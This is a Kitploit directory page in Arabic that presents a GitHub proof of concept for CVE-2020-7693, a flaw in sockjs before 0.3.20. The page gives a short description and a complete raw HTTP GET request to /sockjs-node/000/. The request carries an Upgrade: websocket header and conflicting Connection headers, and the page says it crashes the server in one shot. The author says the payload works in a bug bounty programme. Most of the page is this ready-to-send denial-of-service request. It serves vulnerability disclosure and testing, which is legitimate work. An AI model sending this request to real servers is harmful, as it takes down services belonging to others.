Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-7693 — POC لـ CVE-2020-7693 (اختبار على الإصدار sockjs@0.3.18) | Kitploit
أدوات/GitHubGitHub/thewindghost/cve-2020-7693
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubthewindghost/cve-2020-7693

CVE-2020-7693

POC لـ CVE-2020-7693 (اختبار على الإصدار [email protected])

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-7693 إثبات المفهوم

ملاحظة: أؤكد أن الحمولة الخاصة بـ CVE-2020-7693 يمكن تشغيلها في برنامج مكافآت الثغرات

الوصف:

  • المعالجة غير الصحيحة لرأس الترقية (Upgrade header) بقيمة websocket تؤدي إلى تعطل الحاويات التي تستضيف تطبيقات sockjs. وهذا يؤثر على الحزمة sockjs قبل الإصدار 0.3.20.

طلب واحد يعطل الخادم عبر إصدار قديم من sockjs-node:

  • الطلب
root@kitploit:~
GET /sockjs-node/000/ HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: Upgrade
Upgrade: websocket
Cache-Control: no-cache
Connection: close
\r\n (delete-this)
\r\n (delete-this)

  • الرد
صورة

في الخادم:

صورة صورة
تنزيل الأداة